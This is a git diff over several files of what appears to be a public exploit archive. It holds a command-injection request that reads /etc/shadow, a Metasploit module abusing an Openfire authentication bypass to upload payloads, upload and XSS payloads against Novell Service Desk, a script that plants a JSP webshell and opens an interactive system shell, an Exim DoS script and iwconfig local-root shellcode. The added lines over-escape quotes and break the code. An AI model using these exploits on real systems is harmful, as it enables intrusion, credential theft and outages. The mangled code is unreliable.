reply); - xsendftpcmd(fd, "PASS", password); + printf(\"%s\\n\", reply); + xsendftpcmd(fd, \"PASS\", password); xrecieveall(fd, reply, sizeof(reply)); if (verbose) - printf("%s\n", reply); + printf(\"%s\\n\", reply); - if (reply[0] != '2') { - printf("Login failed.\n"); + if (reply[0] != \'2\') { + printf(\"Login failed.\\n\"); exit(-1); } } @@ -433,10 +433,10 @@ xsendftpcmd(int fd, char *command, char *param) xsend(fd, command); if (param != NULL) { - xsend(fd, " "); + xsend(fd, \" \"); xsend(fd, param); } - xsend(fd, "\r\n"); + xsend(fd, \"\\r\\n\"); } @@ -445,7 +445,7 @@ xsend(int fd, char *buf) { if (send(fd, buf, strlen(buf), 0) != strlen(buf)) { - perror("send"); + perror(\"send\"); exit(-1); } } @@ -462,7 +462,7 @@ xrecieveall(int fd, char *buf, int size) memset(buf, 0, size); do { xrecieve(fd, buf, size); - } while (buf[3] == '-'); + } while (buf[3] == \'-\'); } /* recieves a line from the ftpd */ void @@ -475,25 +475,25 @@ xrecieve(int fd, char *buf, int size) while (buf < end) { if (read(fd, buf, 1) != 1) { - perror("read"); /* XXX */ + perror(\"read\"); /* XXX */ exit(-1); } - if (buf[0] == '\n') { - buf[0] = '\0'; + if (buf[0] == \'\\n\') { + buf[0] = \'\\0\'; return; } - if (buf[0] != '\r') { + if (buf[0] != \'\\r\') { buf++; } } buf--; while (read(fd, buf, 1) == 1) { - if (buf[0] == '\n') { - buf[0] = '\0'; + if (buf[0] == \'\\n\') { + buf[0] = \'\\0\'; return; } } - perror("read"); /* XXX */ + perror(\"read\"); /* XXX */ exit(-1); } diff --git a/platforms/cgi/webapps/39145.txt b/platforms/cgi/webapps/39145.txt index 6582617ad..7ec647e52 100755 --- a/platforms/cgi/webapps/39145.txt +++ b/platforms/cgi/webapps/39145.txt @@ -6,7 +6,7 @@ An attacker may leverage this issue to execute arbitrary commands in the context Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. -curl -i -s -k -X 'POST' \ --H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \ ---data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \ -'hxxps://www.example.com/servlet/Installer' +curl -i -s -k -X \'POST\' \\ +-H \'Content-Type: application/x-www-form-urlencoded\' -H \'User-Agent: Java/1.7.0_25\' \\ +--data-binary $\'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\\\'cat\\\\x20/etc/shadow\\\';$CMD;+YES\' \\ +\'hxxps://www.example.com/servlet/Installer\' diff --git a/platforms/jsp/webapps/19432.rb b/platforms/jsp/webapps/19432.rb index 3470f9012..1bcc10e8f 100755 --- a/platforms/jsp/webapps/19432.rb +++ b/platforms/jsp/webapps/19432.rb @@ -5,8 +5,8 @@ # http://metasploit.com/framework/ ## -require 'msf/core' -require 'rex/zip' +require \'msf/core\' +require \'rex/zip\' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Openfire Admin Console Authentication Bypass', - 'Description' => %q{ + \'Name\' => \'Openfire Admin Console Authentication Bypass\', + \'Description\' => %q{ This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java @@ -29,102 +29,102 @@ class Metasploit3 < Msf::Exploit::Remote the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually. }, - 'Author' => + \'Author\' => [ - 'Andreas Kurtz', # Vulnerability discovery - 'h0ng10' # Metasploit module + \'Andreas Kurtz\', # Vulnerability discovery + \'h0ng10\' # Metasploit module ], - 'License' => MSF_LICENSE, - 'References' => + \'License\' => MSF_LICENSE, + \'References\' => [ - [ 'CVE', '2008-6508' ], - [ 'OSVDB', '49663' ], - [ 'BID', '32189' ], - [ 'EDB', '7075' ], - [ 'URL', 'http://community.igniterealtime.org/thread/35874' ] + [ \'CVE\', \'2008-6508\' ], + [ \'OSVDB\', \'49663\' ], + [ \'BID\', \'32189\' ], + [ \'EDB\', \'7075\' ], + [ \'URL\', \'http://community.igniterealtime.org/thread/35874\' ] ], - 'DisclosureDate' => 'Nov 10 2008', - 'Privileged' => true, - 'Platform' => ['java', 'win', 'linux' ], - 'Stance' => Msf::Exploit::Stance::Aggressive, - 'Targets' => + \'DisclosureDate\' => \'Nov 10 2008\', + \'Privileged\' => true, + \'Platform\' => [\'java\', \'win\', \'linux\' ], + \'Stance\' => Msf::Exploit::Stance::Aggressive, + \'Targets\' => [ # # Java version # - [ 'Java Universal', + [ \'Java Universal\', { - 'Arch' => ARCH_JAVA, - 'Platform' => 'java' + \'Arch\' => ARCH_JAVA, + \'Platform\' => \'java\' } ], # # Platform specific targets # - [ 'Windows x86 (Native Payload)', + [ \'Windows x86 (Native Payload)\', { - 'Platform' => 'win', - 'Arch' => ARCH_X86, + \'Platform\' => \'win\', + \'Arch\' => ARCH_X86, } ], - [ 'Linux x86 (Native Payload)', + [ \'Linux x86 (Native Payload)\', { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, + \'Platform\' => \'linux\', + \'Arch\' => ARCH_X86, } ] ], - 'DefaultTarget' => 0, + \'DefaultTarget\' => 0, )) register_options( [ Opt::RPORT(9090), - OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), - OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]), - OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]), - OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]), - OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]), + OptString.new(\'TARGETURI\', [true, \'The base path to the web application\', \'/\']), + OptString.new(\'PLUGINNAME\', [ false, \'Openfire plugin base name, (default: random)\' ]), + OptString.new(\'PLUGINAUTHOR\',[ false, \'Openfire plugin author, (default: random)\' ]), + OptString.new(\'PLUGINDESC\', [ false, \'Openfire plugin description, (default: random)\' ]), + OptBool.new(\'REMOVE_PLUGIN\', [ false, \'Try to remove the plugin after installation\', false ]), ], self.class) end def check base = target_uri.path - base << '/' if base[-1, 1] != '/' + base << \'/\' if base[-1, 1] != \'/\' - path = "#{base}login.jsp" + path = \"#{base}login.jsp\" res = send_request_cgi( { - 'uri' => path + \'uri\' => path }) if (not res) or (res.code != 200) - print_error("Unable to make a request to: #{path}") + print_error(\"Unable to make a request to: #{path}\") return Exploit::CheckCode::Unknown end - versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/ + versioncheck = res.body =~ /Openfire, \\D*: (\\d)\\.(\\d).(\\d)\\s*<\\/div>/ if versioncheck.nil? then - print_error("Unable to detect Openfire version") + print_error(\"Unable to detect Openfire version\") return Exploit::CheckCode::Unknown end - print_status("Detected version: #{$1}.#{$2}.#{$3}") - version = "#{$1}#{$2}#{$3}".to_i + print_status(\"Detected version: #{$1}.#{$2}.#{$3}\") + version = \"#{$1}#{$2}#{$3}\".to_i return Exploit::CheckCode::Safe if version > 360 # Just to be sure, try to access the log page - path = "#{base}setup/setup-/../../log.jsp" + path = \"#{base}setup/setup-/../../log.jsp\" res = send_request_cgi( { - 'uri' => path + \'uri\' => path }) if (not res) or (res.code != 200) - print_error("Failed: Error requesting #{path}") + print_error(\"Failed: Error requesting #{path}\") return Exploit::CheckCode::Unknown end @@ -133,83 +133,83 @@ class Metasploit3 < Msf::Exploit::Remote def get_plugin_jar(plugin_name) files = [ - [ "logo_large.gif" ], - [ "logo_small.gif" ], - [ "readme.html" ], - [ "changelog.html" ], - [ "lib", "plugin-metasploit.jar" ] + [ \"logo_large.gif\" ], + [ \"logo_small.gif\" ], + [ \"readme.html\" ], + [ \"changelog.html\" ], + [ \"lib\", \"plugin-metasploit.jar\" ] ] jar = Rex::Zip::Jar.new - jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508")) + jar.add_files(files, File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\")) - plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8)) - plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8)) + plugin_author = datastore[\'PLUGINAUTHOR\'] || rand_text_alphanumeric(8+rand(8)) + plugin_desc = datastore[\'PLUGINDESC\'] || rand_text_alphanumeric(8+rand(8)) - plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() } + plugin_xml = File.open(File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\", \"plugin.xml\"), \"rb\") {|fd| fd.read() } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) - jar.add_file("plugin.xml", plugin_xml) + jar.add_file(\"plugin.xml\", plugin_xml) jar end def exploit base = target_uri.path - base << '/' if base[-1, 1] != '/' + base << \'/\' if base[-1, 1] != \'/\' - plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8)) + plugin_name = datastore[\'PLUGINNAME\'] || rand_text_alphanumeric(8+rand(8)) plugin = get_plugin_jar(plugin_name) arch = target.arch - plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]] + plat = [Msf::Module::PlatformList.new(target[\'Platform\']).platforms[0]] if (p = exploit_regenerate_payload(plat, arch)) == nil - print_error("Failed to regenerate payload") + print_error(\"Failed to regenerate payload\") return end - plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack) + plugin.add_file(\"lib/#{rand_text_alphanumeric(8)}.jar\", payload.encoded_jar.pack) plugin.build_manifest # Upload the plugin to the server - print_status("Uploading plugin #{plugin_name} to the server") + print_status(\"Uploading plugin #{plugin_name} to the server\") boundary = rand_text_alphanumeric(6) - data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; " - data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" + data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"uploadfile\\\"; \" + data << \"filename=\\\"#{plugin_name}.jar\\\"\\r\\nContent-Type: application/java-archive\\r\\n\\r\\n\" data << plugin.pack - data << "\r\n--#{boundary}--" + data << \"\\r\\n--#{boundary}--\" res = send_request_cgi({ - 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin", - 'method' => 'POST', - 'data' => data, - 'headers' => + \'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin\", + \'method\' => \'POST\', + \'data\' => data, + \'headers\' => { - 'Content-Type' => 'multipart/form-data; boundary=' + boundary, - 'Content-Length' => data.length, - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + \'Content-Type\' => \'multipart/form-data; boundary=\' + boundary, + \'Content-Length\' => data.length, + \'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\", } }) - print_error("Warning: got no response from the upload, continuing...") if !res + print_error(\"Warning: got no response from the upload, continuing...\") if !res # Delete the uploaded JAR file - if datastore['REMOVE_PLUGIN'] - print_status("Deleting plugin #{plugin_name} from the server") + if datastore[\'REMOVE_PLUGIN\'] + print_status(\"Deleting plugin #{plugin_name} from the server\") res = send_request_cgi({ - 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}", - 'headers' => + \'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}\", + \'headers\' => { - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + \'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\", } }) if not res - print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") + print_error(\"Error deleting the plugin #{plugin_name}. You might want to do this manually.\") end end end diff --git a/platforms/jsp/webapps/39687.txt b/platforms/jsp/webapps/39687.txt index 78f555bcf..030939a6c 100755 --- a/platforms/jsp/webapps/39687.txt +++ b/platforms/jsp/webapps/39687.txt @@ -4,11 +4,11 @@ Disclosure: 30/03/2016 / Last updated: 10/04/2016 >> Background on the affected products: -"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians" +\"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians\" >> Summary: -Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk". +Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:\"LiveTime/WebObjects\". Version 7.2 and above now appear to be branded as \"Micro Focus Service Desk\". Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4]. @@ -32,7 +32,7 @@ Content-Type: multipart/form-data; boundary=---------------------------247747071 Content-Length: 533 -----------------------------2477470717121 -Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp" +Content-Disposition: form-data; name=\"0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23\"; filename=\"../../srv/tomcat6/webapps/LiveTime/bla5.jsp\" Content-Type: application/octet-stream @@ -45,7 +45,7 @@ Content-Type: application/octet-stream -----------------------------2477470717121 -Content-Disposition: form-data; name="ButtonUpload" +Content-Disposition: form-data; name=\"ButtonUpload\" Upload -----------------------------2477470717121-- @@ -102,7 +102,7 @@ Affected versions: GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName= Input is passed directly to Hibernate (line 125 of DownloadAction.class): - List attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list(); + List attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append(\"from \").append(hasEn).append(\" as attach where attach.attachmentId = \").append(hasId.intValue()).toString()).list(); hasEn is entityName (string) and hasId is attachmentId (integer) @@ -123,7 +123,7 @@ a) In the customer portal, clicking the user name will allow you to edit your display name. The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested. Example: -tf_aClientFirstName=Jos">e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=">Guestaa +tf_aClientFirstName=Jos\">e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=\">Guestaa This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up. @@ -131,7 +131,7 @@ b) In the Forums the content section is vulnerable when creating a new topic. The affected parameter is ta_selectedTopicContent. Example: -tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=">&ButtonSave=Save +tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=\">&ButtonSave=Save The alert box will pop up when you view the topic. @@ -141,16 +141,16 @@ Example: POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1 -----------------------------3162880314525 -Content-Disposition: form-data; name="tf_orgUnitName" +Content-Disposition: form-data; name=\"tf_orgUnitName\" -"> +\"> The alert box will pop up when you view the Organizational Units page and possibly in other pages. d) In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor. Example: -tf_aManufacturerFullName=">&tf_aManufacturerName=">&tf_aManufacturerAddress=">&tf_aManufacturerCity=">&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save +tf_aManufacturerFullName=\">&tf_aManufacturerName=\">&tf_aManufacturerAddress=\">&tf_aManufacturerCity=\">&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save Three alert boxes will pop up when you view the Vendor page and possibly in other pages. diff --git a/platforms/jsp/webapps/39691.py b/platforms/jsp/webapps/39691.py index 1aea01378..9629ec093 100755 --- a/platforms/jsp/webapps/39691.py +++ b/platforms/jsp/webapps/39691.py @@ -9,19 +9,19 @@ import urllib2 import urllib -ip = '192.168.150.239' +ip = \'192.168.150.239\' port = 8088 -url = "http://" + ip + ":" + str(port) +url = \"http://\" + ip + \":\" + str(port) #bypass authentication -url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" +url = url+\"/olt/Login.do/../../olt/UploadFileUpload.do\" request = urllib2.Request(url) -webshell_content=''' -<%@ page import="java.util.*,java.io.*" %> +webshell_content=\'\'\' +<%@ page import=\"java.util.*,java.io.*\" %> <% - if (request.getParameter("{cmd}") != null) {{ - Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); + if (request.getParameter(\"{cmd}\") != null) {{ + Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"{cmd}\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); @@ -32,65 +32,65 @@ webshell_content=''' }} }} %> -''' -boundary = "---------------------------7e01e2240a1e" -request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) -post_data = "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" -post_data = post_data + "\r\n.jsp\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" -post_data = post_data + "\r\nwebshell.jsp\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" -post_data = post_data + "\r\n\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" -post_data = post_data + "\r\n\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" -post_data = post_data + "\r\n\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" -post_data = post_data + "\r\n*\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" -post_data = post_data + "Content-Type: text/plain\r\n" -post_data = post_data + "\r\n" + webshell_content +"\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" -post_data = post_data + "\r\nDefault\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" -post_data = post_data + "\r\n.\r\n" -post_data = post_data + "--" + boundary + "\r\n" -post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" -post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" -post_data = post_data + "--" + boundary + "--"+"\r\n" +\'\'\' +boundary = \"---------------------------7e01e2240a1e\" +request.add_header(\'Content-Type\', \"multipart/form-data; boundary=\" + boundary) +post_data = \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.extension\\\"\\r\\n\" +post_data = post_data + \"\\r\\n.jsp\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName1\\\"\\r\\n\" +post_data = post_data + \"\\r\\nwebshell.jsp\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName2\\\"\\r\\n\" +post_data = post_data + \"\\r\\n\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName3\\\"\\r\\n\" +post_data = post_data + \"\\r\\n\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName4\\\"\\r\\n\" +post_data = post_data + \"\\r\\n\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileType\\\"\\r\\n\" +post_data = post_data + \"\\r\\n*\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"file1\\\"; filename=\\\"webshell.jsp\\\"\\r\\n\" +post_data = post_data + \"Content-Type: text/plain\\r\\n\" +post_data = post_data + \"\\r\\n\" + webshell_content +\"\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.repository\\\"\\r\\n\" +post_data = post_data + \"\\r\\nDefault\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.workspace\\\"\\r\\n\" +post_data = post_data + \"\\r\\n.\\r\\n\" +post_data = post_data + \"--\" + boundary + \"\\r\\n\" +post_data = post_data + \"Content-Disposition: form-data; name=\\\"directory\\\"\\r\\n\" +post_data = post_data + \"\\r\\n\" + \"../oats\\servers\\AdminServer\\\\tmp\\_WL_user\\oats_ee\\\\1ryhnd\\war\\pages\" +\"\\r\\n\" +post_data = post_data + \"--\" + boundary + \"--\"+\"\\r\\n\" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : - print "[+]upload done!" - webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" - print "[+]wait a moment,detecting whether the webshell exists..." + print \"[+]upload done!\" + webshellurl = \"http://\" + ip + \":\" + str(port) + \"/olt/pages/webshell.jsp\" + print \"[+]wait a moment,detecting whether the webshell exists...\" if urllib2.urlopen(webshellurl).code == 200 : - print "[+]upload webshell successfully!" - print "[+]return a cmd shell" + print \"[+]upload webshell successfully!\" + print \"[+]return a cmd shell\" while True: - cmd = raw_input(">>: ") - if cmd == "exit" : + cmd = raw_input(\">>: \") + if cmd == \"exit\" : break - print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() + print urllib.urlopen(webshellurl+\"?{cmd}=\" + cmd).read().lstrip() else: - print "[-]attack fail!" + print \"[-]attack fail!\" else: - print "[-]attack fail!" + print \"[-]attack fail!\" except Exception as e: - print "[-]attack fail!" + print \"[-]attack fail!\" -''' +\'\'\' #run the exploit and get a cmd shell root@kali:~/Desktop# python exploit.py [+]upload done! @@ -98,10 +98,10 @@ root@kali:~/Desktop# python exploit.py [+]upload webshell successfully! [+]return a cmd shell >>: whoami -nt authority\system +nt authority\\system >>: exit -''' +\'\'\' diff --git a/platforms/linux/dos/35951.py b/platforms/linux/dos/35951.py index 1509943d2..854da8489 100755 --- a/platforms/linux/dos/35951.py +++ b/platforms/linux/dos/35951.py @@ -13,7 +13,7 @@ # # USAGE: python ghost-smtp-dos.py # -# Escape character is '^]'. +# Escape character is \'^]\'. # 220 debian-7-7-64b ESMTP Exim 4.80 ... # HELO # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 @@ -33,28 +33,28 @@ def main(argv): argc = len(argv) if argc <= 1: - print "usage: %s " % (argv[0]) + print \"usage: %s \" % (argv[0]) sys.exit(0) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 - 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" + buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\" target = argv[1] # SET TARGET port = argv[2] # SET PORT - print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com" - print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer)) + print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\" + print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((target,int(port))) data = s.recv(1024) - print "CONNECTION: " +data - s.send('HELO ' + buffer + '\r\n') + print \"CONNECTION: \" +data + s.send(\'HELO \' + buffer + \'\\r\\n\') data = s.recv(1024) - print "received: " +data - s.send('EHLO ' + buffer + '\r\n') + print \"received: \" +data + s.send(\'EHLO \' + buffer + \'\\r\\n\') data = s.recv(1024) - print "received: " +data + print \"received: \" +data s.close() main(sys.argv) diff --git a/platforms/linux/local/1215.c b/platforms/linux/local/1215.c index c073bdb34..a3a05addb 100755 --- a/platforms/linux/local/1215.c +++ b/platforms/linux/local/1215.c @@ -7,12 +7,12 @@ /* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */ char shellcode[]= - "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" - "\x73\x68\x68\x2f\x62\x69\x6e\x89" - "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" - "\x0b\x51\x52\x55\x89\xe5\x0f\x34" - "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" - "\x55\x89\xe5\x0f\x34"; + \"\\x31\\xc0\\x31\\xdb\\x50\\x68\\x2f\\x2f\" + \"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\" + \"\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\" + \"\\x0b\\x51\\x52\\x55\\x89\\xe5\\x0f\\x34\" + \"\\x31\\xc0\\x31\\xdb\\xfe\\xc0\\x51\\x52\" + \"\\x55\\x89\\xe5\\x0f\\x34\"; int main(int argc,char **argv){ char buf[96]; @@ -20,30 +20,30 @@ int main(int argc,char **argv){ unsigned long ret; int i, offset; unsigned long sp(void) - { __asm__("movl %esp, %eax");} + { __asm__(\"movl %esp, %eax\");} char *prog[]={argv[1],buf,NULL}; - char *env[]={"3v1lsh3ll0=",shellcode,NULL}; + char *env[]={\"3v1lsh3ll0=\",shellcode,NULL}; if (argc >= 2) { - printf("\n*********************************************\n"); - printf(" iwconfig Version 26 Localroot Exploit \n"); - printf(" Coded by Qnix[at]bsdmail[dot]org \n"); - printf("*********************************************\n\n"); + printf(\"\\n*********************************************\\n\"); + printf(\" iwconfig Version 26 Localroot Exploit \\n\"); + printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\"); + printf(\"*********************************************\\n\\n\"); } else { - printf("\n*********************************************\n"); - printf(" iwconfig Version 26 Localroot Exploit \n"); - printf(" Coded by Qnix[at]bsdmail[dot]org \n"); - printf("*********************************************\n\n"); - printf("\n USEAGE: ./iwconfig-exploit \n\n"); + printf(\"\\n*********************************************\\n\"); + printf(\" iwconfig Version 26 Localroot 